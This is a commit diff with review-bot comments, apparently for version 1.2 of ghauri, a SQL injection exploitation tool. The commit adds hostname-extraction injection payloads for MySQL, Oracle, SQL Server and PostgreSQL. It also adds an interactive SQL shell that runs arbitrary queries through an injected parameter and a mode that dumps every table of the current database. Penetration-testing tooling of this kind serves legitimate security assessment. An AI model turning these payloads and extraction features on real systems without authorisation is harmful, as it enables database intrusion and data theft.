Projects STRLCPY ghauri Commits 98eb7483
  • ■ ■ ■ ■ ■
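--- a/README.md
+++ b/README.md
@@ -1,4 +1,4 @@
-[![GitHub release](https://img.shields.io/badge/release-v1.1.9-brightgreen?style=flat-square)](https://github.com/r0oth3x49/ghauri/releases/tag/1.1.9)
+[![GitHub release](https://img.shields.io/badge/release-v1.2-brightgreen?style=flat-square)](https://github.com/r0oth3x49/ghauri/releases/tag/1.2)
 [![GitHub stars](https://img.shields.io/github/stars/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/stargazers)
 [![GitHub forks](https://img.shields.io/github/forks/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/network)
 [![GitHub issues](https://img.shields.io/github/issues/r0oth3x49/ghauri?style=flat-square)](https://github.com/r0oth3x49/ghauri/issues)
@@ -53,6 +53,9 @@
  - added support for skip urlencoding switch: `--skip-urlencode`
  - added support to verify extracted characters in case of boolean/time based injections.
  - added support for handling redirects on user demand.
+ - added support for sql-shell switch: `--sql-shell` (experimental)
+ - added support for fresh queries switch: `--fresh-queries`
+ - added switch for hostname extraction: `--hostname`
 
 
 ## **Advanced Usage**
@@ -70,6 +73,8 @@
  -v VERBOSE Verbosity level: 1-5 (default 1).
  --batch Never ask for user input, use the default behavior
  --flush-session Flush session files for current target
+ --fresh-queries Ignore query results stored in session file
+ --test-filter Select test payloads by titles (experimental)
 
 Target:
  At least one of these options has to be provided to define the
@@ -146,9 +151,12 @@
  -C COLS DBMS database table column(s) to enumerate
  --start Retrieve entries from offset for dbs/tables/columns/dump
  --stop Retrieve entries till offset for dbs/tables/columns/dump
+ --sql-shell Prompt for an interactive SQL shell (experimental)
 
 Example:
- ghauri http://www.site.com/vuln.php?id=1 --dbs
+ ghauri -u http://www.site.com/vuln.php?id=1 --dbs
+
+
 </code></pre>
 
 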
  • ■ ■ ■ ■
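--- a/ghauri/__init__.py
+++ b/ghauri/__init__.py
@@ -24,7 +24,7 @@
 
 """
 
-__version__ = "1.1.9"
+__version__ = "1.2"
 __author__ = "Nasir Khan (r0ot h3x49)"
 __license__ = "MIT"
 __copyright__ = "Copyright (c) 2016-2025 Nasir Khan (r0ot h3x49)"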
  • ■ ■ ■ ■ ■
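--- a/ghauri/common/config.py
+++ b/ghauri/common/config.py
@@ -106,6 +106,7 @@
  self._bool_ctt = None
  self._bool_ctf = None
  self._match_ratio_check = False
+ self.fresh_queries = False
 
  @property
  def session_filepath(self):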
  • ■ ■ ■ ■ ■ ■
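--- a/ghauri/common/payloads.py
+++ b/ghauri/common/payloads.py
@@ -166,11 +166,20 @@
  "PostgreSQL": ["CURRENT_SCHEMA()", "(SELECT current_database())"],
 }
 
-# PAYLOADS_HOSTNAME = [
-# "@@HOSTNAME",
-# "HOST_NAME()",
-# "(SELECT+CONCAT(boot_val)+FROM+pg_settings WHERE name='listen_addresses' GROUP BY boot_val)",
-# ]
+PAYLOADS_HOSTNAME = {
+ "MySQL": [
+ "@@HOSTNAME",
+ ],
+ "Oracle": [
+ "(SELECT UTL_INADDR.GET_HOST_NAME FROM DUAL)",
+ "(SELECT host_name FROM v$instance)",
+ ],
+ "Microsoft SQL Server": ["@@SERVERNAME", "HOST_NAME()", "(SELECT HOST_NAME())"],
+ "PostgreSQL": [
+ "(SELECT CONCAT(boot_val) FROM pg_settings WHERE name='listen_addresses' GROUP BY boot_val)",
+ "(SELECT inet_server_addr())",
+ ],
+}
 
 PAYLOADS = {
  "BooleanTests": {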
  • ■ ■ ■ ■ ■ ■
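--- a/ghauri/core/extract.py
+++ b/ghauri/core/extract.py
@@ -1746,57 +1746,31 @@
  error_msg = None
  retry_on_error = 0
  is_resumed = False
- retval_session = session.fetchall(
- session_filepath=conf.session_filepath,
- query="SELECT * FROM storage WHERE `type`=?",
- values=(dump_type,),
- )
- if retval_session:
- retval_session = retval_session.pop()
- is_resumed = True
- result = retval_session.get("value")
- length = retval_session.get("length")
- logger.progress(f"resumed: {result}")
- last_row_id = retval_session.get("id")
- if len(result) == length:
- _temp = PayloadResponse(
- ok=True,
- error="",
- result=result,
- payload="",
- resumed=is_resumed,
- )
- return _temp
+ if dump_type and not conf.fresh_queries:
+ retval_session = session.fetchall(
+ session_filepath=conf.session_filepath,
+ query="SELECT * FROM storage WHERE `type`=?",
+ values=(dump_type,),
+ )
+ if retval_session:
+ retval_session = retval_session.pop()
+ is_resumed = True
+ result = retval_session.get("value")
+ length = retval_session.get("length")
+ logger.progress(f"resumed: {result}")
+ last_row_id = retval_session.get("id")
+ if len(result) == length:
+ _temp = PayloadResponse(
+ ok=True,
+ error="",
+ result=result,
+ payload="",
+ resumed=is_resumed,
+ )
+ return _temp
  if error_based_in_vectors:
  vector = conf.vectors.get("error_vector")
  while start < end:
- # if http_firewall_code_counter > 2:
- # message = f"{error_msg} - {http_firewall_code_counter} time(s)"
- # logger.warning(f"HTTP error code detected during run:")
- # choice = logger.read_input(
- # f"{message}. how do you want to proceed? [(C)continue/(q)uit] ",
- # batch=False,
- # user_input="C",
- # )
- # if choice == "q":
- # logger.error("user quit")
- # logger.end("ending")
- # exit(0)
- # if choice == "c":
- # http_firewall_code_counter = 0
- # if retry_on_error >= retry:
- # logger.warning(f"Ghauri detected connection errors multiple times")
- # choice = logger.read_input(
- # f"how do you want to proceed? [(C)continue/(q)uit] ",
- # batch=False,
- # user_input="C",
- # )
- # if choice == "q":
- # logger.error("user quit")
- # logger.end("ending")
- # exit(0)
- # if choice == "c":
- # retry_on_error = 0
  entry = payloads[start]
  response_string = ""
  if delay > 0:
@@ -1895,7 +1869,7 @@
  "it was not possible to count the number of entries for the SQL query provided. Ghauri will assume that it returns only one entry"
  )
  try:
- if dump_type:
+ if dump_type and not conf.fresh_queries:
  session.dump(
  session_filepath=conf.session_filepath,
  query=STORAGE,
@@ -2014,7 +1988,7 @@
  is_resumed = False
  start_pos = 1
  start_chars = ""
- if dump_type:
+ if dump_type and not conf.fresh_queries:
  retval_session = session.fetchall(
  session_filepath=conf.session_filepath,
  query="SELECT * FROM storage WHERE `type`=?",
@@ -2072,7 +2046,7 @@
  ok=True, error="", result="", payload=length, resumed=False
  )
  try:
- if not is_resumed and dump_type:
+ if not is_resumed and dump_type and not conf.fresh_queries:
  last_row_id = session.dump(
  session_filepath=conf.session_filepath,
  query=STORAGE,
@@ -2241,7 +2215,11 @@
  conf._thread_chars_query = {}
  with conf.lock:
  try:
- if dump_type and chars:
+ if (
+ dump_type
+ and chars
+ and not conf.fresh_queries
+ ):
  session.dump(
  session_filepath=conf.session_filepath,
  query=STORAGE_UPDATE,
@@ -2528,7 +2506,11 @@
  "it seems the current payload is filtered out by some sort of WAF/IDS."
  )
  break
- if dump_type and chars:
+ if (
+ dump_type
+ and chars
+ and not conf.fresh_queries
+ ):
  session.dump(
  session_filepath=conf.session_filepath,
  query=STORAGE_UPDATE,
@@ -2741,7 +2723,11 @@
  "it seems the current payload is filtered out by some sort of WAF/IDS."
  )
  break
- if dump_type and chars:
+ if (
+ dump_type
+ and chars
+ and not conf.fresh_queries
+ ):
  session.dump(
  session_filepath=conf.session_filepath,
  query=STORAGE_UPDATE,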
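Review bot: `--fresh-queries` is documented as "Ignore query results stored in session file", but the guards added at new lines 1872, 2049, 2218, 2509 and 2726 also skip every `session.dump(...)` write, not only the `session.fetchall(...)` reads at new lines 1749 and 1991. As far as these hunks show, a run with the flag therefore never refreshes the stored rows, so a later run without it would resume the older values. If that is intended, the option's help text should say so, e.g. `help="Ignore stored query results and do not write new ones to the session file"`; otherwise keep `not conf.fresh_queries` on the two read paths only. The same condition is now spelled out seven times; computing it once per function (`use_session = bool(dump_type) and not conf.fresh_queries`) would keep the call sites in step. The enclosing functions start and end outside the visible hunks.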
  • ■ ■ ■ ■ ■ ■
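--- a/ghauri/extractor/common.py
+++ b/ghauri/extractor/common.py
@@ -36,6 +36,7 @@
  PAYLOADS_TBLS_COUNT,
  PAYLOADS_COLS_COUNT,
  PAYLOADS_RECS_COUNT,
+ PAYLOADS_HOSTNAME,
 )
 
 from ghauri.common.lib import collections
@@ -213,6 +214,95 @@
  else:
  logger.info("retrieved: '%s'" % (retval.result))
  logger.success(f"current user: '{retval.result}'")
+ else:
+ error = retval.error
+ if error:
+ message = f"Ghauri detected an error during current user extraction ({error})"
+ logger.warning(f"{message}")
+ logger.end("ending")
+ exit(0)
+ else:
+ retval = guess
+ return retval
+
+ def fetch_hostname(
+ self,
+ url,
+ data,
+ vector,
+ parameter,
+ headers,
+ base,
+ injection_type,
+ backend="",
+ proxy=None,
+ is_multipart=False,
+ timeout=30,
+ delay=0,
+ timesec=5,
+ attack=None,
+ match_string=None,
+ not_match_string=None,
+ code=None,
+ text_only=False,
+ ):
+ logger.info("fetching hostname")
+ Response = collections.namedtuple(
+ "Response",
+ ["ok", "error", "result", "payload"],
+ )
+ guess = ghauri_extractor.fetch_characters(
+ url=url,
+ data=data,
+ vector=vector,
+ parameter=parameter,
+ headers=headers,
+ base=base,
+ injection_type=injection_type,
+ payloads=PAYLOADS_HOSTNAME.get(backend),
+ backend=backend,
+ proxy=proxy,
+ is_multipart=is_multipart,
+ timeout=timeout,
+ delay=delay,
+ timesec=timesec,
+ attack01=attack,
+ match_string=match_string,
+ not_match_string=not_match_string,
+ code=code,
+ query_check=True,
+ text_only=text_only,
+ )
+ if guess.ok:
+ logger.debug(f"working payload found: '{guess.payload}'")
+ retval = ghauri_extractor.fetch_characters(
+ url=url,
+ data=data,
+ vector=vector,
+ parameter=parameter,
+ headers=headers,
+ base=base,
+ injection_type=injection_type,
+ payloads=[guess.payload],
+ backend=backend,
+ proxy=proxy,
+ is_multipart=is_multipart,
+ timeout=timeout,
+ delay=delay,
+ timesec=timesec,
+ attack01=attack,
+ match_string=match_string,
+ not_match_string=not_match_string,
+ code=code,
+ text_only=text_only,
+ dump_type="hostname",
+ )
+ if retval.ok:
+ if retval.resumed:
+ logger.info("resumed: '%s'" % (retval.result))
+ else:
+ logger.info("retrieved: '%s'" % (retval.result))
+ logger.success(f"hostname: '{retval.result}'")
  else:
  error = retval.error
  if error: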
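Review bot: In `fetch_hostname` (new line 262) `payloads=PAYLOADS_HOSTNAME.get(backend)` evaluates to `None` whenever `backend` is not one of the four keys of the table, which includes the signature default `backend=""`; whether `fetch_characters` tolerates `payloads=None` is not visible on this page. Use `PAYLOADS_HOSTNAME.get(backend, [])` and return early with a warning when the list is empty, so an unrecognised backend fails with a clear message instead of deep inside the extractor. The `Response` namedtuple built at new line 250 is not used in the visible lines, but the method's tail continues past the hunk, so confirm before removing it. The method also has no docstring; a short one that names the `"hostname"` session key passed as `dump_type` would help.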
  • ■ ■ ■ ■ ■ ■
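--- a/ghauri/ghauri.py
+++ b/ghauri/ghauri.py
@@ -30,6 +30,7 @@
 from ghauri.core.extract import ghauri_extractor
 from ghauri.logger.colored_logger import logger, set_level
 from ghauri.core.tests import basic_check, check_injections
+from ghauri.core.extract import ghauri_extractor as ge
 from ghauri.common.lib import (
  os,
  re,
@@ -90,6 +91,8 @@
  safe_chars=None,
  fetch_using=None,
  test_filter=None,
+ sql_shell=False,
+ fresh_queries=False,
 ):
  verbose_levels = {
  1: logging.INFO,
@@ -105,6 +108,7 @@
  conf.timesec = timesec
  conf.fetch_using = fetch_using
  conf.test_filter = test_filter
+ conf.fresh_queries = fresh_queries
  logger.start("starting")
  if not force_ssl:
  ssl._create_default_https_context = ssl._create_unverified_context
@@ -426,26 +430,70 @@
  )
  logger.end("ending")
  exit(1)
- return GhauriResponse(
- url=url,
- data=data,
- vector=vector,
- backend=backend,
- parameter=parameter,
- headers=full_headers,
- base=base,
- injection_type=injection_type,
- proxy=proxy,
- filepaths=filepaths,
- is_injected=True,
- is_multipart=is_multipart,
- attack=attack,
- match_string=match_string,
- vectors=vectors,
- code=code if code != 200 else None,
- not_match_string=None,
- text_only=conf.text_only,
- )
+ if sql_shell:
+ logger.info(
+ "calling MySQL shell. To quit type 'x' or 'q' and press ENTER"
+ )
+ while True:
+ choice = logger.read_input("sql-shell> ")
+ if choice:
+ if choice.lower() in ["x", "q"]:
+ break
+ logger.info(f"fetching SQL query output: '{choice}'")
+ retval = ghauri_extractor.fetch_characters(
+ url=url,
+ data=data,
+ vector=vector,
+ parameter=parameter,
+ headers=full_headers,
+ base=base,
+ injection_type=injection_type,
+ payloads=[choice],
+ backend=backend,
+ proxy=proxy,
+ is_multipart=is_multipart,
+ timeout=timeout,
+ delay=delay,
+ timesec=timesec,
+ attack01=attack,
+ match_string=match_string,
+ not_match_string=None,
+ code=code if code != 200 else None,
+ text_only=conf.text_only,
+ dump_type=choice,
+ )
+ if retval.ok:
+ if retval.resumed:
+ logger.info("resumed: '%s'" % (retval.result))
+ else:
+ logger.info("retrieved: '%s'" % (retval.result))
+ logger.success(f"{choice}: '{retval.result}'")
+ logger.info(
+ f"fetched data logged to text files under: '{filepaths.filepath}'"
+ )
+ logger.end("ending")
+ exit(0)
+ else:
+ return GhauriResponse(
+ url=url,
+ data=data,
+ vector=vector,
+ backend=backend,
+ parameter=parameter,
+ headers=full_headers,
+ base=base,
+ injection_type=injection_type,
+ proxy=proxy,
+ filepaths=filepaths,
+ is_injected=True,
+ is_multipart=is_multipart,
+ attack=attack,
+ match_string=match_string,
+ vectors=vectors,
+ code=code if code != 200 else None,
+ not_match_string=None,
+ text_only=conf.text_only,
+ )
  # end of injection
  logger.critical("all tested parameters do not appear to be injectable.")
  logger.end("ending")
@@ -520,7 +568,7 @@
  self._code = code
  self._text_only = text_only
 
- def __end(self, database="", table="", fetched=True):
+ def _end(self, database="", table="", fetched=True):
  new_line = ""
  if database and table:
  filepath = os.path.join(conf.filepaths.filepath, "dump")
@@ -557,9 +605,8 @@
  text_only=self._text_only,
  )
  fetched = response.ok
- if fetched:
- logger.success("")
- self.__end(fetched=fetched)
+ # if fetched:
+ # logger.success("")
  return response
 
  def extract_hostname(self):
@@ -584,9 +631,8 @@
  text_only=self._text_only,
  )
  fetched = response.ok
- if fetched:
- logger.success("")
- self.__end(fetched=fetched)
+ # if fetched:
+ # logger.success("")
  return response
 
  def extract_current_db(self):
@@ -611,9 +657,8 @@
  text_only=self._text_only,
  )
  fetched = response.ok
- if fetched:
- logger.success("")
- self.__end(fetched=fetched)
+ # if fetched:
+ # logger.success("")
  return response
 
  def extract_current_user(self):
@@ -638,9 +683,8 @@
  text_only=self._text_only,
  )
  fetched = response.ok
- if fetched:
- logger.success("")
- self.__end(fetched=fetched)
+ # if fetched:
+ # logger.success("")
  return response
 
  def extract_dbs(self, start=0, stop=None):
@@ -669,9 +713,8 @@
  fetched = response.ok
  if not fetched:
  response = self.extract_current_db()
- if fetched:
- logger.success("")
- self.__end(fetched=fetched)
+ # if fetched:
+ # logger.success("")
  return response
 
  def extract_tables(self, database="", start=0, stop=None, dump_requested=False):
@@ -699,13 +742,11 @@
  database=database,
  )
  fetched = response.ok
- if fetched:
- logger.success("")
- else:
- logger.error("unable to retrieve the table names for any database")
- print("\n")
- if not dump_requested:
- self.__end(fetched=True)
+ # if not fetched:
+ # logger.success("")
+ # else:
+ # logger.error("unable to retrieve the table names for any database")
+ # print("\n")
  return response
 
  def extract_columns(
@@ -736,10 +777,8 @@
  table=table,
  )
  fetched = response.ok
- if fetched:
- logger.success("")
- if not dump_requested:
- self.__end(fetched=fetched)
+ # if fetched:
+ # logger.success("")
  return response
 
  def extract_records(
@@ -779,11 +818,8 @@
  fetched = response.ok
  if fetched:
  if not dump_requested:
- logger.success("")
- self.__end(database=database, table=table, fetched=fetched)
- else:
- if not dump_requested:
- self.__end(fetched=fetched)
+ # logger.success("")
+ self._end(database=database, table=table, fetched=False)
  return response
 
  def dump_database(self, database="", start=0, stop=None, dump_requested=False):
@@ -812,8 +848,7 @@
  dump_requested=dump_requested,
  )
  if retval_dump.ok:
- self.__end(database=database, table=table, fetched=False)
- self.__end(fetched=True)
+ self._end(database=database, table=table, fetched=False)
 
  def dump_table(
  self, database="", table="", start=0, stop=None, dump_requested=False
@@ -835,6 +870,47 @@
  dump_requested=dump_requested,
  )
  if retval_dump.ok:
- self.__end(database=database, table=table, fetched=False)
- self.__end(fetched=True)
+ self._end(database=database, table=table, fetched=False)
+
+ def dump_current_db(
+ self, database="", start=0, stop=None, current_db=None, dump_requested=False
+ ):
+ logger.warning(
+ "missing database parameter. Ghauri is going to use the current database to enumerate table(s) entries"
+ )
+ if not current_db:
+ retval_current_db = self.extract_current_db()
+ if retval_current_db.ok:
+ current_db = retval_current_db.result.strip()
+ if current_db:
+ retval_tables = self.extract_tables(
+ database=current_db,
+ start=start,
+ stop=stop,
+ dump_requested=dump_requested,
+ )
+ if retval_tables.ok:
+ for table in retval_tables.result:
+ retval_columns = self.extract_columns(
+ database=current_db,
+ table=table,
+ start=start,
+ stop=stop,
+ dump_requested=dump_requested,
+ )
+ if retval_columns.ok:
+ retval_dump = self.extract_records(
+ database=current_db,
+ table=table,
+ columns=",".join(list(retval_columns.result)),
+ start=start,
+ stop=stop,
+ dump_requested=dump_requested,
+ )
+ if retval_dump.ok:
+ self._end(database=current_db, table=table, fetched=False)
+ else:
+ logger.error(
+ "Ghauri is expecting database name to enumerate table(s) entries."
+ )
 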
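Review bot: In the `--sql-shell` loop (new lines 437-470) a statement whose `retval.ok` is false produces no output at all: there is no `else` branch, so the prompt just returns and the operator cannot tell a failed extraction from an empty result. Log the failure, e.g. `else: logger.warning(f"unable to retrieve output for: '{choice}' ({retval.error})")`. The banner at new line 435 says "calling MySQL shell" although `backend` can be any supported DBMS, and the raw typed statement is passed as `dump_type=choice`, which the extractor hunks use as the session `type` key, so every typed statement is persisted in the session file unless `--fresh-queries` is set; both deserve a comment. New line 33 imports `ghauri_extractor as ge` while the loop uses the existing `ghauri_extractor` name, so the alias looks unused in the visible hunks. The enclosing function starts outside the hunk.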
  • ■ ■ ■ ■ ■ ■
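--- a/ghauri/scripts/ghauri.py
+++ b/ghauri/scripts/ghauri.py
@@ -65,6 +65,12 @@
  help="Flush session files for current target",
  )
  general.add_argument(
+ "--fresh-queries",
+ dest="fresh_queries",
+ action="store_true",
+ help="Ignore query results stored in session file",
+ )
+ general.add_argument(
  "--test-filter",
  dest="test_filter",
  type=str,
@@ -416,6 +422,12 @@
  default=None,
  metavar="",
  )
+ enumeration.add_argument(
+ "--sql-shell",
+ dest="sql_shell",
+ action="store_true",
+ help="Prompt for an interactive SQL shell (experimental)",
+ )
  examples = parser.add_argument_group("Example", description=examples)
 
  args = parser.parse_args()
@@ -463,6 +475,8 @@
  safe_chars=args.safe_chars,
  fetch_using=args.fetch_using,
  test_filter=args.test_filter,
+ sql_shell=args.sql_shell,
+ fresh_queries=args.fresh_queries,
  )
  if resp.is_injected:
  target = ghauri.Ghauri(
@@ -484,17 +498,16 @@
  match_string=resp.match_string,
  vectors=resp.vectors,
  )
- if not args.dbs and (
- args.hostname or args.current_user or args.current_db or args.banner
- ):
- if args.banner:
- target.extract_banner()
- if args.current_user:
- target.extract_current_user()
- if args.current_db:
- target.extract_current_db()
- if args.hostname:
- target.extract_hostname()
+ current_db = None
+ if args.banner:
+ target.extract_banner()
+ if args.current_user:
+ target.extract_current_user()
+ if args.current_db:
+ response = target.extract_current_db()
+ current_db = response.result.strip() if response.ok else None
+ if args.hostname:
+ target.extract_hostname()
  if args.dbs:
  target.extract_dbs(start=args.limitstart, stop=args.limitstop)
  if args.db and args.tables:
@@ -523,7 +536,6 @@
  stop=args.limitstop,
  dump_requested=True,
  )
-
  if args.db and args.tbl and args.dump and not args.cols:
  target.dump_table(
  database=args.db,
@@ -532,6 +544,10 @@
  stop=args.limitstop,
  dump_requested=True,
  )
+ if args.dump and not args.db and not args.tbl and not args.cols:
+ target.dump_current_db(current_db=current_db, dump_requested=True)
+ logger.success("")
+ target._end()
 
 
 if __name__ == "__main__":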
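Review bot: With new lines 547-548, `args.dump` set while `args.db`, `args.tbl` and `args.cols` are all empty now calls `target.dump_current_db(...)`, which per the `ghauri/ghauri.py` section walks every table of the current database and extracts its records. That is a large change in how much data a single flag retrieves during an assessment, and nothing in the visible argparse or README hunks documents it. State it in the `--dump` help text (outside these hunks) and, unless `--batch` is set, confirm with the operator before starting. New lines 549-550 also call `logger.success("")` and the underscore-prefixed `target._end()` from outside the class; a public wrapper would make that dependency explicit. Indentation is lost in this rendering, so whether those two calls sit inside the `if resp.is_injected:` block cannot be confirmed from the page.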
  • ■ ■ ■ ■
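--- a/setup.py
+++ b/setup.py
@@ -5,7 +5,7 @@
 
 setup(
  name="ghauri",
- version="1.1.9",
+ version="1.2",
  description="An advanced SQL injection detection & exploitation tool.",
  classifiers=["Programming Language :: Python3"],
  author="Nasir Khan",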